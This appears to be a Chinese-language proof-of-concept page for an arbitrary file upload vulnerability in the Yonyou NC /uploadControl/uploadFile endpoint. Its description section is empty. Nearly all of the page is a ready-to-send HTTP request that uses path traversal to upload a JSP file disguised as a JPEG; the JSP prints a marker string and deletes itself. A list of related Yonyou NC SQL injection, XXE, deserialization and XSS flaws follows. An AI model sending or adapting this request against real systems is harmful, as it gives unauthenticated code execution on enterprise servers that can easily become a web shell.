用友NC /uploadControl/uploadFile 接口存在任意文件上传漏洞

漏洞描述

PoC代码

POST /mp/initcfg/../uploadControl/uploadFile HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Content-Length: 369

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file"; filename="oopwxv.jsp"
Content-Type: image/jpeg

<% out.println("HelloWorldTest");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="submit"

上传
------WebKitFormBoundarygcflwtei--

相关漏洞推荐

• 用友NC及NC Cloud系统 /uapws/service/nc.itf.bap.service.IBapIOService getBapTableDatas SQL 注入漏洞
• 用友NC /portal/pt/portalcombo/importCombo XML 外部实体注入漏洞
• 用友NC存在 oncelogin/getAuth SQL注入漏洞
• 用友NC /portal/pt/oacoSchedulerEvents/uncancelEvent SQL 注入漏洞
• 用友NC /ebvp/register/qrySubPurchaseOrgByParentPk SQL 注入漏洞
• 用友 NC Cloud /ncchr/pm/obj/queryPsnInfo SQL 注入漏洞
• 用友NC /portal/pt/infopathimport/importExcelTemplate pageId 文件上传漏洞
• 用友NC OAUserQryServlet 反序列化漏洞
• 用友NC OAUserAuthenticationServlet 反序列化漏洞
• 用友NC ContactsQueryServiceServlet 反序列化漏洞
• POC 用友NC UserSynchronizationServlet 反序列化漏洞
• 用友NC ContactsFuzzySearchServlet 反序列化漏洞
• 用友 NC /portal/pt/nc5x/fwd 存在跨站点脚本攻击漏洞